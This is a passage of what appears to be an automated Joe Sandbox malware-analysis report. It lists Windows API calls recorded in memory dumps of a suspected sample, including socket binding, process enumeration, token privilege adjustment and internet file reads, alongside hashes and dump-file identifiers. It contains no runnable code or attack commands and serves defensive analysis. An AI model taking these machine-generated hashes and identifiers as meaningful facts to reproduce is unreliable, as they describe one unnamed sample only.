                                • WSAGetLastError.WSOCK32(00000000), ref: 00B16B20
                                • closesocket.WSOCK32(00000000,00000000), ref: 00B16B34
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                • String ID:
                                • API String ID: 99427753-0
                                • Opcode ID: 0f3b31989b7ac85adbb12802642d74734e766cbd7109d62db605582b2a43de4e
                                • Instruction ID: 02d377882c4f0a97df46416ba9394cb9ae6453bed0e98fef4e395235d4d2337f
                                • Opcode Fuzzy Hash: 0f3b31989b7ac85adbb12802642d74734e766cbd7109d62db605582b2a43de4e
                                • Instruction Fuzzy Hash: 3541B175B00214AFEB20AF649D86F7FB7E8DB09710F448059F91AAB2D2DB749D018791
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                • String ID:
                                • API String ID: 292994002-0
                                • Opcode ID: 0d17347656c6bbbad0d76f52a8ca4e1bd912aaae29849ac33d6abc72324d7be0
                                • Instruction ID: da35c9a34410c9fa654d72dc5c781bb094a2e2c3fce0e80e05db89cf486fa250
                                • Opcode Fuzzy Hash: 0d17347656c6bbbad0d76f52a8ca4e1bd912aaae29849ac33d6abc72324d7be0
                                • Instruction Fuzzy Hash: C411B2317009216FE7321F26EC44B2B77E9EF55761B444479F80AD7251CB30D902CAA5
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00AE1D88,?), ref: 00B1C312
                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B1C324
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                • API String ID: 2574300362-1816364905
                                • Opcode ID: 537d643494a1bdbc9b388290f9e6ae0860232dab3a772a1590115ad808fc6804
                                • Instruction ID: f021eb5573494bf29431881898fc22b07055ba954250da164f18f8e897bda3c3
                                • Opcode Fuzzy Hash: 537d643494a1bdbc9b388290f9e6ae0860232dab3a772a1590115ad808fc6804
                                • Instruction Fuzzy Hash: A4E0EC74650713CFDB304F25E808B967AE4EF08756BC084B9E8A6D3260EB70D891CA60
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: __itow__swprintf
                                • String ID:
                                • API String ID: 674341424-0
                                • Opcode ID: c9ef3f64e70e03df854d1c2fe3d7e08a43d272d003d10f7f6b42ad16a2aa26b0
                                • Instruction ID: 9cdd9a3413406a64637f77c1c6e6f6677c5a95be8780c15a8a734242f6cb4ac4
                                • Opcode Fuzzy Hash: c9ef3f64e70e03df854d1c2fe3d7e08a43d272d003d10f7f6b42ad16a2aa26b0
                                • Instruction Fuzzy Hash: B3229D726083419FCB24DF24C991BAFB7E8BF85300F14491DF5969B292DB71EA04CB92
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00B1F151
                                • Process32FirstW.KERNEL32(00000000,?), ref: 00B1F15F
                                  • Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82
                                • Process32NextW.KERNEL32(00000000,?), ref: 00B1F21F
                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00B1F22E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                • String ID:
                                • API String ID: 2576544623-0
                                • Opcode ID: 1e444ec3964ed2b1d8ea2170475fdbc59f94b0f131fa0b99c4a1e19b0ace7e95
                                • Instruction ID: 5d24b7fd1df66b7835cb674393f1df605ee1331763ad8d29bf36bf56852ebc3f
                                • Opcode Fuzzy Hash: 1e444ec3964ed2b1d8ea2170475fdbc59f94b0f131fa0b99c4a1e19b0ace7e95
                                • Instruction Fuzzy Hash: 8C516D71504301AFD320EF20DC85EABBBE8FF99750F50492DF495972A1EB70A909CB92
                                APIs
                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B040D1
                                • _memset.LIBCMT ref: 00B040F2
                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00B04144
                                • CloseHandle.KERNEL32(00000000), ref: 00B0414D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                • String ID:
                                • API String ID: 1157408455-0
                                • Opcode ID: 622e113f0fb826d7e3984ff0895304549e4d94ffc83b810b36b5c578cddd82ac
                                • Instruction ID: b5e1a62f472a07038cfb3c09faf4cd3d6b9eeecf416beaaa0545f4e63426cfd9
                                • Opcode Fuzzy Hash: 622e113f0fb826d7e3984ff0895304549e4d94ffc83b810b36b5c578cddd82ac
                                • Instruction Fuzzy Hash: F411AB759012287AD7309BA59C4DFABBBBCEF45760F1041EAF908E7180D6744E808BA4
                                APIs
                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00AFEB19
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: lstrlen
                                • String ID: ($|
                                • API String ID: 1659193697-1631851259
                                • Opcode ID: a4b33c8bf6ce59c69f3b70c18bff787f0c22c31ad1e9768049c7ab272d984c78
                                • Instruction ID: 259aee191c8abf57185311fb71611e9cb136590996be1f03cf5862496cf91c03
                                • Opcode Fuzzy Hash: a4b33c8bf6ce59c69f3b70c18bff787f0c22c31ad1e9768049c7ab272d984c78
                                • Instruction Fuzzy Hash: 99322575A00605DFD728CF69C481A6AB7F1FF48310B15C56EE99ADB3A1EB70E981CB40
                                APIs
                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00B126D5
                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B1270C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Internet$AvailableDataFileQueryRead
                                • String ID:
                                • API String ID: 599397726-0
                                • Opcode ID: ef150fd11959fb512fb58ff79f39ee2406dacf7d695e7960dabc4f804648896d
                                • Instruction ID: 97e8f517293aa70d8f21e1990fcea588990141aa41b3417904b9bb6e54129f8f
                                • Opcode Fuzzy Hash: ef150fd11959fb512fb58ff79f39ee2406dacf7d695e7960dabc4f804648896d
                                • Instruction Fuzzy Hash: 8941C375A00209BFEB24DB94DDC5EFBB7FCEB40714F5040AEFA01A6180EA719ED19654
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 00B0B5AE
                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B0B608
                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00B0B655
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ErrorMode$DiskFreeSpace
                                • String ID:
                                • API String ID: 1682464887-0
                                • Opcode ID: 16077d5f009897b10f4ed82085c957e8385526a56add76c52b04cf8f47f5a48d
                                • Instruction ID: 07f4b7e2eb137d6f1496b551108cacef3c0b0dc52c58b139c63474b54a79a195
                                • Opcode Fuzzy Hash: 16077d5f009897b10f4ed82085c957e8385526a56add76c52b04cf8f47f5a48d
                                • Instruction Fuzzy Hash: 38215135A00518EFCB00EF65D985EAEBBB8FF49310F1480A9E905AB3A1DB319916CB51
                                APIs
                                  • Part of subcall function 00AC0FF6: std::exception::exception.LIBCMT ref: 00AC102C
                                  • Part of subcall function 00AC0FF6: __CxxThrowException@8.LIBCMT ref: 00AC1041
                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF8D0D
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF8D3A
                                • GetLastError.KERNEL32 ref: 00AF8D47
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                • String ID:
                                • API String ID: 1922334811-0
                                • Opcode ID: 5a9e6eb098c4de0e9aac694ce4b929209488a5c227efbce64d31e9cc2cac73f8
                                • Instruction ID: 74339bf2ff839fad55567ceda469da8310ac34a4f922aebbd87ef40c5f62f1ed
                                • Opcode Fuzzy Hash: 5a9e6eb098c4de0e9aac694ce4b929209488a5c227efbce64d31e9cc2cac73f8
                                • Instruction Fuzzy Hash: 09116AB1914209AFE728AFA4DD85D7BB7BCEB44710B20852EF85693241EF30A8418A64
                                APIs
                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00B04C2C
                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B04C43
                                • FreeSid.ADVAPI32(?), ref: 00B04C53
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                • String ID:
                                • API String ID: 3429775523-0
                                • Opcode ID: 1d79b45340708588b3331c426fc4fdbb704c9644efea7fc584aed98232f5c315
                                • Instruction ID: 985c58f4877b566b6cffa6edac3e0a324c4b10be587fe4a998188c071e3ea1f0
                                • Opcode Fuzzy Hash: 1d79b45340708588b3331c426fc4fdbb704c9644efea7fc584aed98232f5c315
                                • Instruction Fuzzy Hash: 77F03775A11309BBDB14DFE09D89ABEBBB8EB08201F0044A9AA01E2181E6706A448B50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 268e95f0d1ce8385fe272e031da6066fdfa0f37c4d21ab31d764d72346df35e8
                                • Instruction ID: 6daaf346bb1d0b502e3db12a0bc893560c73b7e025cbc4e0748c3755566b7302
                                • Opcode Fuzzy Hash: 268e95f0d1ce8385fe272e031da6066fdfa0f37c4d21ab31d764d72346df35e8
                                • Instruction Fuzzy Hash: 9122A975A00216CFDF24DF58C594AAEBBF4FF0A300F148569E856AB381E731AD85CB91
                                APIs
                                • FindFirstFileW.KERNEL32(?,?), ref: 00B0C966
                                • FindClose.KERNEL32(00000000), ref: 00B0C996
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID:
                                • API String ID: 2295610775-0
                                • Opcode ID: 7c65cbc0a8985c1b846921d70449a8da4d29799d8e4f182e11ebba08984e9fb1
                                • Instruction ID: b042fa6e84aec6d99dd1d5020e363a41ddea343b8d10a55992be91fd251b0576
                                • Opcode Fuzzy Hash: 7c65cbc0a8985c1b846921d70449a8da4d29799d8e4f182e11ebba08984e9fb1
                                • Instruction Fuzzy Hash: F51161726106049FD710EF29D945A2BFBE9FF85324F00865EF9A9D72A1DB30AC01CB81
                                APIs
                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00B1977D,?,00B2FB84,?), ref: 00B0A302
                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00B1977D,?,00B2FB84,?), ref: 00B0A314
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ErrorFormatLastMessage
                                • String ID:
                                • API String ID: 3479602957-0
                                • Opcode ID: 96a638b190e3d672486b19e4210f3a3f341761f7d7932eb3e5182bb3f9811cdb
                                • Instruction ID: 5291f2548f756b6d528c9d30f02398ed1d4cb36e6566d8c9cca9b6ba9d63db66
                                • Opcode Fuzzy Hash: 96a638b190e3d672486b19e4210f3a3f341761f7d7932eb3e5182bb3f9811cdb
                                • Instruction Fuzzy Hash: B3F0823554532DBBDB209FA4CC48FEA776DFF09761F0085A6B909D7181DA30D940CBA1
                                APIs
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AF8851), ref: 00AF8728
                                • CloseHandle.KERNEL32(?,?,00AF8851), ref: 00AF873A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: AdjustCloseHandlePrivilegesToken
                                • String ID:
                                • API String ID: 81990902-0
                                • Opcode ID: 5a5366afc464266cf8c5d3da91d39f7b16de6eb8ee6497cb53f7b63144363635
                                • Instruction ID: 968b8853ff35d1fdc97e60a927adfa5b71d39763df60f0226b2fc3fc8fc846ac
                                • Opcode Fuzzy Hash: 5a5366afc464266cf8c5d3da91d39f7b16de6eb8ee6497cb53f7b63144363635
                                • Instruction Fuzzy Hash: DDE0EC76010611EFE7352B60ED09E777BF9EF04750725883DF99681471DB62AC91DB10
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00AC8F97,?,?,?,00000001), ref: 00ACA39A
                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00ACA3A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 40910b223dd2323996a2f35af4248b36187bf9327b4e73c5f7ae04c109db0516
                                • Instruction ID: 4474e3e82796cc78bea31e764e68234c2189cff7cab07738f4d3066313ef9d62
                                • Opcode Fuzzy Hash: 40910b223dd2323996a2f35af4248b36187bf9327b4e73c5f7ae04c109db0516
                                • Instruction Fuzzy Hash: B7B0923105420AEBCA106B91EC09BA83F78EB44AA2F404030F60D86060CF6254528A99
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
